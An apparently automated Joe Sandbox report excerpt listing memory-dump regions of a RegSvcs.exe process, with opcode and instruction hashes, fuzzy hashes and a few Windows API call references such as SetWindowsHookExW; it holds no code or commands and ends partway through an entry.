                                              • Instruction Fuzzy Hash: 08C227B0A01219DFEB25DF64C885BADBBB2FF89301F1085A9E909A7351DB359D81CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dee81d47b0cc7ac2b943717bbd41142bd1cc7260e1649a3d00a9092dff137a7a
                                              • Instruction ID: babd20cd9fb8104ad8b1e0688d471561bdfa7ae4f53035636a5e5fa8bb1c3073
                                              • Opcode Fuzzy Hash: dee81d47b0cc7ac2b943717bbd41142bd1cc7260e1649a3d00a9092dff137a7a
                                              • Instruction Fuzzy Hash: 6D9229B4A00215CFDB28DF29C994A69BBF2FF88310F158599D94A9B361DB30ED81CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 509d5de290b533834473a57ca4e8ba7384b7941182a5db9a54c658eea29dc0e5
                                              • Instruction ID: 50ed8ad8bad2d1fcdfe49506069b27d70ccd98af291a7e540b5831a773419c19
                                              • Opcode Fuzzy Hash: 509d5de290b533834473a57ca4e8ba7384b7941182a5db9a54c658eea29dc0e5
                                              • Instruction Fuzzy Hash: 97621AF0600305DBE74D9F68D45871ABAE6EB84308F24C46C851D9F392DBBBD90B8B95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d24f672a1c1003dfeb3a8d3bec59bf3038db575fb0ec410fa18563a583bb2dc
                                              • Instruction ID: 9479daee81fd8485c7d007612bd8e30994e3e61f95306370aa47bccfa721a2ab
                                              • Opcode Fuzzy Hash: 1d24f672a1c1003dfeb3a8d3bec59bf3038db575fb0ec410fa18563a583bb2dc
                                              • Instruction Fuzzy Hash: F66219F0600305DBE74D9F68D45871ABAE6EB84308F24C46C851D9F392CBBBD90B8B95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e01cb722aa21a352deec61b7ccf3820220d8664ce306a8fd0b1a1c4deec8943
                                              • Instruction ID: 81bebe89111dfc1edf72f93f2e9d074c593f2787bc9d5a98b7d6cc170ad9eb54
                                              • Opcode Fuzzy Hash: 0e01cb722aa21a352deec61b7ccf3820220d8664ce306a8fd0b1a1c4deec8943
                                              • Instruction Fuzzy Hash: EE525DB4A0020ADFEB19DFA4D494A9DBBF2FF89310F158169E9099B365DB31EC41CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1369d21bf329d61f9c1d562e8f575147c2e64624282168e236ee459cf7f1f4fb
                                              • Instruction ID: ff307cf0c7af0624aee57a9f8cfc7550a155c4532a38edf2afc03240067cd39b
                                              • Opcode Fuzzy Hash: 1369d21bf329d61f9c1d562e8f575147c2e64624282168e236ee459cf7f1f4fb
                                              • Instruction Fuzzy Hash: D542C0B1A00341DFEB29DF34C448A6ABBF6FF85315F144869D94ACB691CB78E981CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad08edae97ac39b9d75b178683e2658d2feaa89f057d5f4929fc637fc7f5d852
                                              • Instruction ID: 24647501cc9bcf88c7c84c83c88880c79ed2f60bb8a73f1a518ce7e3d3dbfcde
                                              • Opcode Fuzzy Hash: ad08edae97ac39b9d75b178683e2658d2feaa89f057d5f4929fc637fc7f5d852
                                              • Instruction Fuzzy Hash: 22125CB4B102069FCB24DF68C8549AEBBF6BF89750F158169D906EB365DB30EC41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f4ff77c72ad9d78752060e4655f746d93878c74fec7f4e79329b6002b9edf56
                                              • Instruction ID: dca6f86c48d92b631146a1dfe310b3df6ff8b13afb56f7e750e99a314e3268db
                                              • Opcode Fuzzy Hash: 0f4ff77c72ad9d78752060e4655f746d93878c74fec7f4e79329b6002b9edf56
                                              • Instruction Fuzzy Hash: B3F16FB4A00309DFEB09DFA4D854AADBBB2FF88304F148569D81AAB355DB35EC45CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ;k
                                              • API String ID: 0-4239655375
                                              • Opcode ID: ad78efbaaac41d717bbb91f02cef90434b97e6ba721915defb706ee82d3adfa6
                                              • Instruction ID: 13b27cddd9d83a274bf3b20ceaa9c92c95806d590ea47e6fa8c15a7d3db8e6d5
                                              • Opcode Fuzzy Hash: ad78efbaaac41d717bbb91f02cef90434b97e6ba721915defb706ee82d3adfa6
                                              • Instruction Fuzzy Hash: 1E3249B4710606CFDB14DF29C994AAABBF2FF89340B1584A9E506CB362DB74EC45CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: ed89817ef4d1ccdfa332284a09223fca473ffd1d663117bd1f00f66a1813970b
                                              • Instruction ID: ffd31b11e3a521ed8ac5cf0b01c7ad5b7272b71df086cfc1edc4615970000fbc
                                              • Opcode Fuzzy Hash: ed89817ef4d1ccdfa332284a09223fca473ffd1d663117bd1f00f66a1813970b
                                              • Instruction Fuzzy Hash: F081C5707143099FEB1A9F38945526E3AA6FFC6360F24422DE92A9B3D1CF358D41C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-65463447
                                              • Opcode ID: ab9afbf4cdbb1c8e658a014f4f164987c7df9a6e57644ede3824215748c77b02
                                              • Instruction ID: 91d3cde5478258b4d1a5b2f73c4b53011ccf957e086708fa293c1c25e489639a
                                              • Opcode Fuzzy Hash: ab9afbf4cdbb1c8e658a014f4f164987c7df9a6e57644ede3824215748c77b02
                                              • Instruction Fuzzy Hash: 6CF17CB5B00306DBEB199B68D850A6EBBF6EF84344B108529DC1ADB744EF74DC418B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ./\
                                              • API String ID: 0-3176372042
                                              • Opcode ID: 5bf9ca7c779135ee7e754d16f30b2263a1d5fb7ff9bfc98fbd506e8c6ba50ec3
                                              • Instruction ID: 019092aeeb38975d1161b6a5f69b6c23713c5ae784835b0fc780250f19e058da
                                              • Opcode Fuzzy Hash: 5bf9ca7c779135ee7e754d16f30b2263a1d5fb7ff9bfc98fbd506e8c6ba50ec3
                                              • Instruction Fuzzy Hash: 36E1D070B053469FDB09EF74C49065EBBB6EF85300F1585AEC4099B282DB35EC46CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc2793b5613bdc2a7ad1d06ce75e8355f0d2bc3c6e887e986dcfe268c68b246e
                                              • Instruction ID: 05db2008063ba72377c880d9ffd2448a8cd153eee24b79c6a0ba99223e4edcfd
                                              • Opcode Fuzzy Hash: cc2793b5613bdc2a7ad1d06ce75e8355f0d2bc3c6e887e986dcfe268c68b246e
                                              • Instruction Fuzzy Hash: 5ED25B74721305CFDB6AEB34E0A866D37B3BF8A344B50486CD8069B394EF359D429B52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01407E8E,?,?,?,?,?), ref: 01407F4F
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: bf441916b26dbd43d9496127128beac4146c3ec2c6b51a197346192545ea5117
                                              • Instruction ID: e6a7433dbd0ac9c03f4fdeca9794feab114c4f808d908026e27e76902d750ade
                                              • Opcode Fuzzy Hash: bf441916b26dbd43d9496127128beac4146c3ec2c6b51a197346192545ea5117
                                              • Instruction Fuzzy Hash: 9D21E5B59003499FDB10CFAAD984ADEBFF4EB48320F14841AE958A3350D375A954CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01407E8E,?,?,?,?,?), ref: 01407F4F
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 07cf63a565837435776f8ed9728d6d6da5fd2c8758b8b01c44cc9dbc9de0241c
                                              • Instruction ID: c30c99242f6ed9c55bb619bd0c9ef16bbb5146fd8091d49240a8565920ca9ee3
                                              • Opcode Fuzzy Hash: 07cf63a565837435776f8ed9728d6d6da5fd2c8758b8b01c44cc9dbc9de0241c
                                              • Instruction Fuzzy Hash: D421E4B5900249DFDB10CFAAD985AEEBFF4FB48310F14841AE958A3350D375A954CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              APIs
                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01402A43
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: HookWindows
                                              • String ID:
                                              • API String ID: 2559412058-0
                                              • Opcode ID: 32660f34ee82f477fd17dcddfcd9bacc6224c221c68ab5cb3c6b0e06dec9df38
                                              • Instruction ID: ad968ac52e8b586741d431987cf2a61273913c36d074e6d24f4338b3c33e8bad
                                              • Opcode Fuzzy Hash: 32660f34ee82f477fd17dcddfcd9bacc6224c221c68ab5cb3c6b0e06dec9df38
                                              • Instruction Fuzzy Hash: 67213771D002499FDB14DF9AD848BDFBBF5EF88320F14842AD514A7290CBB5A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              APIs
                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01402A43
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: HookWindows
                                              • String ID:
                                              • API String ID: 2559412058-0
                                              • Opcode ID: 4bd92dbd576cb89586902676f941eaf0e38bbc11d60b92310902ec5fd4893ab5
                                              • Instruction ID: fc3fb94965dfb07f1c1f08a917ca20b58b80a4ecab2f7d75bd14a06957548c3e
                                              • Opcode Fuzzy Hash: 4bd92dbd576cb89586902676f941eaf0e38bbc11d60b92310902ec5fd4893ab5
                                              • Instruction Fuzzy Hash: BF211575D00249CFDB14DF9AD848BDFBBF5AF88320F10842AD519A7290CBB5A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0140D3DD
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              • API String ID: 2492992576-0
                                              • Opcode ID: 52b5e4651b2e273860393380069b2bbb5329ed4887398e728742a7d21209dd53
                                              • Instruction ID: 10c129f9c36f9894261c15de570e8b31bf1b51dd952d8573c16a15ca3c866296
                                              • Opcode Fuzzy Hash: 52b5e4651b2e273860393380069b2bbb5329ed4887398e728742a7d21209dd53
                                              • Instruction Fuzzy Hash: 4E21DEB5808799CECB22CF9AC5463EEBFF0AB05224F00809AD088A7382C7795508CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0140D3DD
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              • API String ID: 2492992576-0
                                              • Opcode ID: 08eefdb317b142453b5de86376936fda63a7ea1777d8ec97cf27120b7ea3f956
                                              • Instruction ID: 77291aa1253af5db068a76b043109e051e1410e5445971fc40a339287fa842d1
                                              • Opcode Fuzzy Hash: 08eefdb317b142453b5de86376936fda63a7ea1777d8ec97cf27120b7ea3f956
                                              • Instruction Fuzzy Hash: 821190B5804799CEDB21CF9AC5453DEBFF4EB05314F10805AD599A7382C7B95608CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ;k
                                              • API String ID: 0-4239655375
                                              • Opcode ID: 63384f0d3cb35008d593e756505ac76bdc52e8328def6e1cf321deef01468ef6
                                              • Instruction ID: 1541a76e3af190673dd179902c2ad97ff05f6f869be80bef36e39acae23073cc
                                              • Opcode Fuzzy Hash: 63384f0d3cb35008d593e756505ac76bdc52e8328def6e1cf321deef01468ef6
                                              • Instruction Fuzzy Hash: 37B14774710646CFCB14DF39C998A9ABBF2BF89341B1540A9E546DB362DB30ED05CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 13f765ac32ee8977ae22e7db63362037e857e010f653d2381a1f2872e7a995cf
                                              • Instruction ID: 9d50675f30624cba2a7ae06147c0b8f366862029176a2906e4f1afd266511ba8
                                              • Opcode Fuzzy Hash: 13f765ac32ee8977ae22e7db63362037e857e010f653d2381a1f2872e7a995cf
                                              • Instruction Fuzzy Hash: FA61ABB4A1060ADFCB24DF59D4C08AAF7B6FF88300B51C629CA9997655DB30FC91CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf3e24ec07cba9d0cbcff5848f5f81ac2723d7e61ffe9c34918dcb7e42a9469e
                                              • Instruction ID: 1b95641b8ccb4cf7a711fc332acf5df29c7954ea2f450e0c5c0cee7c463046eb
                                              • Opcode Fuzzy Hash: bf3e24ec07cba9d0cbcff5848f5f81ac2723d7e61ffe9c34918dcb7e42a9469e
                                              • Instruction Fuzzy Hash: 9DE21A74A01319EFEB55ABA0E854BAEBB32FF88300F104098DA192B799CF755D91CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-65463447
                                              • Opcode ID: 19f7f60411d5d8231a5415e44faf4e2a06f9bc672db66908049343b120213d97
                                              • Instruction ID: cad49cf0b99160aaea399819995107afc9332b3c0130a7a86f0136b776fca1f6
                                              • Opcode Fuzzy Hash: 19f7f60411d5d8231a5415e44faf4e2a06f9bc672db66908049343b120213d97
                                              • Instruction Fuzzy Hash: 505182B4A003159FDB19DF69D894A9EBBF6FF84354F00842DE919AB350DF70AD458B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ^'t
                                              • API String ID: 0-687385829
                                              • Opcode ID: 1a62ffef9607f6eb2c8d5035e9508393b9a928dba3c251d8358644848c50921b
                                              • Instruction ID: 440036b0deecd8a59c435ebc9b215eb0edb6b47995ccee64e75d4279ff9ab0a9
                                              • Opcode Fuzzy Hash: 1a62ffef9607f6eb2c8d5035e9508393b9a928dba3c251d8358644848c50921b
                                              • Instruction Fuzzy Hash: 4B41F975B10214CFDB19DBA4D594AAEB7F3FFC8210B258429E816A7394DF719D02CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8b2568436105b650138ecc99db18b575ab7a6555a16eedad7e905fa4e2e621d1
                                              • Instruction ID: ac9f9ee7f580207c8d4f4e07d871a2094fc8d82689a6739301a5afd7692b0883
                                              • Opcode Fuzzy Hash: 8b2568436105b650138ecc99db18b575ab7a6555a16eedad7e905fa4e2e621d1
                                              • Instruction Fuzzy Hash: 5DF148B5B11601CFDB55DF2AC489A6ABBF2FF85310F1984A9E946CB761CB34E810CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b04b77e43771b8c89719f8161761764df6c2accd2dfe9d96dee960e90e90651a
                                              • Instruction ID: 5c2945c18936d89506702b7173b867b54fea04d80d66c51ae9947e5392b55ba9
                                              • Opcode Fuzzy Hash: b04b77e43771b8c89719f8161761764df6c2accd2dfe9d96dee960e90e90651a
                                              • Instruction Fuzzy Hash: A4D1C6B4B042058FEB15DB68C490AAD7FB6EFCA320F148169D509DB3A1CB35DC45CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b4ec800efc4953a4f8577347edb06ce5cd59954785eb7511af3b46e3e24a7eb4
                                              • Instruction ID: 497e8d8bf705c7086a98dc758e086a0c84d208613f1fa7ff88d4ef1f2b344779
                                              • Opcode Fuzzy Hash: b4ec800efc4953a4f8577347edb06ce5cd59954785eb7511af3b46e3e24a7eb4
                                              • Instruction Fuzzy Hash: 05D106F1B11226DFEB258F648840A3ABBE6AF89794F15496ADC49DB350CB30DC41CBD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 317c4328c793471ebfa6a9691b79d4237d97b9bd04d30a3b1a3f57bc91be67fb
                                              • Instruction ID: b263d3348de1c0915c2c58a656e3a99a5aee39f228a9dcc09e3c80f9339c5d64
                                              • Opcode Fuzzy Hash: 317c4328c793471ebfa6a9691b79d4237d97b9bd04d30a3b1a3f57bc91be67fb
                                              • Instruction Fuzzy Hash: C0E18EB0A00305DFDB19DF68C484A5ABBF2FF89310B1585ADD8199B362DB71ED45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8722242f506e3e14210bd47e2962d15500e3c3a09686d506f58a941d894733a3
                                              • Instruction ID: bb96ae961e74706773289292085bfe9938af0a810fce700db62a7fcf5e28bd18
                                              • Opcode Fuzzy Hash: 8722242f506e3e14210bd47e2962d15500e3c3a09686d506f58a941d894733a3
                                              • Instruction Fuzzy Hash: D0C12D7570624ADFE705EB60E8A0E7A732AEFC8B00F244119EC015B39DDB766D469BC4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c98a277659ec059ecdbd56303681b9e09b39f74594e389eee829ef5fa3723851
                                              • Instruction ID: 77452328e66e02e8902d857c4541b798c22bf0af1d49f21b5f30927e9259fcf1
                                              • Opcode Fuzzy Hash: c98a277659ec059ecdbd56303681b9e09b39f74594e389eee829ef5fa3723851
                                              • Instruction Fuzzy Hash: 75D192B1A0020ADFEB19DF74D850A9EBBF2FF84304F148169E919AB251DB31ED45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 31b35bec81a972063c202d261aa4071f6abe97c64db45014117b6117fb787da2
                                              • Instruction ID: 86add5c1d142d31bd7c069874062287cc3d08a343acd5745b8be7acc8de2cb97
                                              • Opcode Fuzzy Hash: 31b35bec81a972063c202d261aa4071f6abe97c64db45014117b6117fb787da2
                                              • Instruction Fuzzy Hash: F2A1B0F1714281EFE7199A79C840A6A7BE6EFC5310F14896AEE0ACB355DE31DC81C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e803e7d95016d7ea08dc3a13d59cf8cbc05de6f7a62ca975062e858e851963aa
                                              • Instruction ID: 943d3631a29d340ae3f25a85c22046146048bf39856961041136b30c8520fae0
                                              • Opcode Fuzzy Hash: e803e7d95016d7ea08dc3a13d59cf8cbc05de6f7a62ca975062e858e851963aa
                                              • Instruction Fuzzy Hash: 1FB158F0315702DFEB25DA28C444B6ABBEAAF85301F148929ED4BC7691DB34F841CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1058ef1f9d3722de13993c885ff21e06d49d3dcef353e68e611b96fa44d2e605
                                              • Instruction ID: e1696668b4f9047ab16ad560ab36bce3cdaed889dcc171d1484c5178f9e2e13f
                                              • Opcode Fuzzy Hash: 1058ef1f9d3722de13993c885ff21e06d49d3dcef353e68e611b96fa44d2e605
                                              • Instruction Fuzzy Hash: E5B192B17053429FE315CB68C444D66BBE3EB86314B19D59AD94ACB762CB30EC82C760
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a4f175487b32e38816227c8e620804c7bef62b30964c6c9bc2e46ab8a4b05fce
                                              • Instruction ID: 6d79f31a830051330ca429bc739ec633a741018ae361a05a2edc394fbcbb05ab
